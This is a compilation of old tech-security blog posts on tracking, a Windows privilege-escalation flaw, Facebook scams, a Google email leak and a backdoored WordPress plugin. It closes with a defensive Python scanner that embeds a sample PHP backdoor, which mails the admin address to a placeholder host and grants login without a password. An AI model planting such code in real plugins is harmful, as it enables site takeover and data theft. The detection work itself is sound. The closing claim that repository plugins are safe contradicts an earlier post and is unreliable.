Each and every website you visit tracks your movements across the internet. This is basically done through cookies, URL redirection and more. Many of these sites then use this data to customize the advertisements displayed to you.
If you are not comfortable sharing your data with third-party websites, you can now try out a new extension called Disconnect for the Google Chrome and RockMelt browsers.
Disconnect stops major third parties and search engines from tracking the web pages you visit and the searches you make. It disables tracking on websites and depersonalizes searches on search engines like Google. It also has a nice little counter that shows the requests it has blocked, and an option to easily disable blocking for certain sites.
Disconnect was written by an ex-Googler who calls this service Web 2.1 and claims that he is fixing all the wrongs on the web right now. If you are looking to disable third-party tracking, head over to http://www.disconnectere.com/ and download the extension for Chrome or RockMelt.
When Microsoft added UAC (User Account Control), the promise was that it would make Windows more secure. Pardon me if I come across as a cynic, but all it seems capable of doing is annoying users. Yes, Windows 7 makes UAC a lot more bearable, but it’s still annoying. On top of that, it doesn’t actually do a lot to prevent malware attacks or malicious program execution. To make things even worse, a new flaw has been uncovered that can be used to completely bypass UAC in Windows Vista and 7.
The developers of the popular security software Prevx spotted a new 0-day vulnerability being discussed on a Chinese forum. According to them, “This is a serious flaw because it resides in win32k.sys, the kernel mode part of the Windows subsystem. It is a privilege escalation exploit which allows even limited user accounts to execute arbitrary code in kernel mode.”
This flaw basically enables an attacker to execute applications with system (full) privileges. Unfortunately, there is not a lot you can do to keep yourself safe at this point in time. Sophos has suggested a workaround; however, it is not known how effective the proposed safety measure is.
Facebook launched its new messaging service with fanfare, saying that it would be a great way to communicate with people, with less spam. However, it looks like they still have quite a lot of work to do in fighting spam in Facebook Messaging.
According to a Business Insider writer, his Facebook Email account has already received a spam message in which the sender said that he had won some money and, in order to get it, he would have to send along some personal details. Such spam messages are very common with regular email and are usually marked as spam by services such as Gmail and Hotmail.
However, Facebook Messaging has yet to deal with such messages; it will have to filter them out and mark them as scams. Facebook Email/Messaging is still in its infancy and not widely used, so they still have plenty of time before a huge number of users begin to use it.
Time to start polishing the rough edges then... I mean the spam filters, to catch such common spam messages. No?
According to BitDefender, 2 out of 10 Facebook Walls (or News Feeds) are infected or at risk in some way. In October, BitDefender, a well-known anti-virus and security provider, launched a Facebook app called BitDefender safego. Safego scans your Facebook wall posts to determine if there are any links to bad apps or risky links. Here’s a quote from BitDefender:
Since its launch, BitDefender safego has managed to scan 17 million Facebook posts and it has detected infections on the news feeds of around 20% of its users. We are glad we’ve been able to warn our users of these threats and we’ll continue to focus our efforts on adding new security features and increasing our detection rate. Thanks everyone for your feedback and remember: if your friends stay safe, then you’re safe!
In addition to all of Facebook’s privacy problems, everyone should know by now that it’s a huge source of infections for Windows PCs. BitDefender apparently decided that it was time to help warn people about this problem.
The free BitDefender safego app is currently in beta testing, and you can try it out by visiting its page while logged into Facebook. In addition to the link- and app-checking abilities of BitDefender safego, it also checks your profile for information that you should not be sharing.
I was fortunate enough to get a clean bill of health from safego; can you say the same about your Wall? Give safego a try now to be sure.
With 500+ million users, 500+ million scams are bound to happen. Another sleazy scam is now underway, and it involves showing people "Really cool Facebook revolving images".
The message is spreading virally, and I had to delete around 9 messages from my wall recently. As always, do not click on this link, and delete it from your wall if you see it.
P.S. I visited the site in question to see what it had to offer, but it is just a parked page, so nothing to write home about here. Safe Facebooking.
Update: It looks like this scam is spreading differently now. Users are now writing on other people’s walls with the text "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/"
TechCrunch is reporting that an exploit in Google Friend Connect allows a website to harvest the email addresses of logged-in Google users who visit it. The exploit was demonstrated when users visited guntada.blogspot.com, which is now blocked by Google.
According to TechCrunch, this happened when you were logged in to your Gmail or Google account. Only your email address was harvested, but this is not only a big security hole but also a big privacy breach.
Once you visited the said site, you would receive an email at your logged-in address, as shown above. Scary, right? Google is already fixing it as we speak; we will update this post once we receive an update from Google.
Update: Google Spokesperson Lily Lin sent us the following statement:
We quickly fixed the issue in the Google Apps Script API that could have allowed for emails to be sent to Gmail users without their permission if they visited a specially designed website while signed into their account. We immediately removed the site that demonstrated this issue, and disabled the functionality soon after. We encourage responsible disclosure of potential application security issues to [email protected]
As enticing as this feature sounds, it is practically impossible to obtain such information using apps, thanks to the restrictions Facebook has put in place. So, first of all, such apps are a farce, and secondly, they are only interested in luring people into clicking on the link you share and then fooling you into sharing it with your friends too.
These kinds of attacks have been very popular on Facebook for spreading links that do nothing. Of course, most of these scams do little damage, but they spread virally thanks to the number of people who use Facebook. The newest scam has a link with the text “Check Who Viewed YoUr Fbook Profile – An Easy App to Check Who Viewed YoUr FaceBook Profile. It Really Words So don’t Wait Check Out Now!”
For the record, the screenshot above is filled with references to I am malware site.
Once again, a simple piece of advice for people who use Facebook: all that glitters is not gold; likewise, not everything with a link and enticing text on Facebook is real, so stay away from clicking on it.
What did Microsoft do that puts libraries at risk?
They retired Windows SteadyState. In case you haven’t heard of it, SteadyState is a free application for Windows XP and Vista that completely protects a Windows installation from everything except a hardware crash. It makes Windows almost bullet-proof. Thousands of home users, internet cafes, schools and public libraries depend on SteadyState for protection. However, it won’t be available for Windows 7.
According to Yardena,
… not only is SteadyState incompatible with Win7, Microsoft says it has no plans to introduce a Windows 7-compatible version. That’s leaving some IT managers scrambling for replacement technology and others vowing not to upgrade to Windows 7 at all.
If you settled for the answer given in that Windows Secrets post, you’d give up. In the article, Yardena says:
Third-party solutions, such as Faronics’ Deep Freeze, don’t appeal to cash-strapped educational institutions, which are already spending considerable money upgrading to Windows 7.
Worse yet, if you listen to Microsoft, they’ll tell you that you don’t need it. Here’s the Microsoft spin:
We have just released a whitepaper along with an accompanying document that describes Group Policy settings that you can use to configure computer and user settings and also a reference excel worksheet which can be used to look up and filter the settings described in the whitepaper. (source)
Fortunately, a security company named Comodo recently released a free replacement for Windows SteadyState. As far as I can tell, Comodo Time Machine does nearly everything SteadyState does. It’s currently supported and works in Windows XP, Vista and 7.
If a librarian or teacher came to me and asked about setting up several public computers, I’d have two ready answers for them. I could save them money and practically guarantee that they wouldn’t have any spyware or virus problems.
1. I’d burn a set of Live CDs with Edubuntu on them. They could disable the hard drives and put these in the CD-ROM drives. Whenever the PC boots up, they’d have a fresh new operating system that’s ready to use and kid-proof.
That plugin is not in the WordPress repository and never will be, but there are thousands of plugins which are already in the repository and thousands which will eventually be part of it. Here is the catch: adding a WordPress plugin to the repository is as easy as sending an email. You just create a legitimate plugin, upload it to SVN, and it’s there in the repository for everyone to use.
Now, here is the problem. As far as I know, there are no checks on what code is added to a plugin, and on top of that there are no checks at all on future updates. In plain words, I can create a legitimate plugin and introduce it to the repository. After that, whatever updates I make to it will never be checked (other than by clever WordPress users who sift through the code), since WordPress plugin updates are based on SVN trunks.
Any new trunk you create will be made available as an update to the end user, regardless of what code you put into it. Now, this may not seem alarming, since there are hardly any scams related to WordPress plugins within the repository, but today’s event goes to show that it can be exploited. It does not take much effort to get a plugin into the repository, so a scammer/hacker would be able to create multiple plugins, add exploit code to them and offer it as updates. By the time the exploit is discovered, it might be too late for users who have already updated and sent out sensitive information to the hacker.
Now, while I am making a valid point here, there is really no foolproof way to stop this problem. Of course, it would help if there were safety checks, and maybe community-based checking of code before it is actually made available as an update to users. Community-based code checks are hard, if not impossible, because they would require people to actually check the updated code before it is made available to users. This would also add a hassle for developers who are contributing for free; however, in the end it would be beneficial to everyone.
Now here is the big problem: none of these harmful extensions are available through the repositories (if they are, they are quickly taken off), but people can still go ahead and install them. Just as Firefox has the ability to block extensions (they blocked the .NET and WPF add-ons from Microsoft), and Google Chrome has developed features in the browser to block unsafe extensions, WordPress has to take steps to block harmful plugins at the core. They have to have the ability to inform users about, or explicitly block, plugins which are harmful.
Considering how huge a community WordPress has, it would be easy to have a system in place to report unsafe extensions, whether or not they are present in the repository, along with providing a friendly warning to users that the plugin they are about to install might be unsafe. In addition to that, they have to move towards encouraging more and more developers to use the WordPress repository for plugins. I had written about the benefits of adding plugins to the WP repo on WLTC and saw many developers unhappy with the system, so this might take a while.
If they add this feature, and it works on the fly, it would be one of the best features I could use. Though I am an experienced plugin developer and have coded plugins such as WordPress Automatic Upgrade, I fear for the millions of people who might start adding plugins which are really bad.
I hope WordPress does something about this, as it could easily get out of hand. The coder of BlogPress was foolish: he wrote code that could easily be identified. Imagine intelligent people being able to write code which cannot be identified, and the threats just multiply.
WordPress is an open community, and practically anyone can develop plugins or themes for it. However, there are several shady plugins for WordPress out there which you might as well stay away from.
One such plugin is called BlogPress SEO, which promises users hundreds of backlinks once they install it. However, don’t fall for it: it is a trap that will expose your login information to the developer of the plugin and allow them to automatically log in to your blog.
There are a couple of blog posts from Yoast and Mtekk which expose the big problems with this plugin. First of all, the plugin stealthily emails your admin email address to the author of the plugin. The second and bigger problem is that the plugin has a function which allows the plugin author to bypass the WordPress login.
Yes, you read that right: the plugin first emails your admin email to the author and then allows him to log in to your WordPress admin without a password. Scary, right?
If you have installed the BlogPress SEO plugin, you have to do a few things. First off, deactivate the plugin ASAP. Secondly, change your admin email address; changing your password will do no good. Thirdly, only install plugins which are available in the WordPress repository, as they are safe.
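A defender-side check for the two behaviours described in this post and in the plugin-repository post above: a small static scanner that flags plugin source which reads the admin e-mail and sends it out, or which mints a login session from request input. This is an added example, not code from BlogPress SEO, Yoast, Mtekk or WordPress itself; the WordPress function names are real, but the rule set and the sample plugin text are constructed for illustration.

```python
import re

# Regexes for the two behaviours the BlogPress SEO write-ups describe. The
# WordPress function names are real; hits are leads for review, not verdicts.
RULES = {
    "leaks-admin-email": re.compile(r"get_option\(\s*['\"]admin_email['\"]"),
    "mails-out":         re.compile(r"\bwp_mail\s*\("),
    "remote-call":       re.compile(r"\bwp_remote_(post|get|request)\s*\("),
    "sets-auth-cookie":  re.compile(r"\bwp_set_auth_cookie\s*\("),
    "sets-current-user": re.compile(r"\bwp_set_current_user\s*\("),
    "request-trigger":   re.compile(r"\$_(GET|POST|REQUEST)\s*\["),
}
# A finding needs one hit from each group: reading the admin address AND
# sending it somewhere; minting a session AND doing so on request input.
COMBOS = {
    "admin-email-exfiltration": ({"leaks-admin-email"}, {"mails-out", "remote-call"}),
    "login-bypass": ({"sets-auth-cookie", "sets-current-user"}, {"request-trigger"}),
}

def scan_source(src):
    """Return {rule name: [line numbers]} for every rule matching the PHP text."""
    hits = {}
    for lineno, line in enumerate(src.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def findings(hits):
    """Name each combo for which both rule groups produced at least one hit."""
    seen = set(hits)
    return [c for c, (a, b) in COMBOS.items() if a & seen and b & seen]

# Constructed sample in the shape the write-ups describe; not the plugin's real code.
SAMPLE_PLUGIN = """<?php
function xs_phone_home() {
    $owner = get_option('admin_email');
    wp_mail('collector@example.invalid', 'new install', home_url() . ' ' . $owner);
}
function xs_backdoor() {
    if (isset($_GET['xs_token'])) {
        wp_set_auth_cookie(1);  // session for user ID 1, no password checked
    }
}
add_action('init', 'xs_phone_home'); add_action('init', 'xs_backdoor');
"""

def scan_sample():
    """Scan the constructed sample; returns (per-rule line hits, findings)."""
    hits = scan_source(SAMPLE_PLUGIN)
    return hits, findings(hits)
```

Point scan_source at each PHP file under wp-content/plugins to triage a whole install; a plugin that trips a combo deserves a manual read before it stays active.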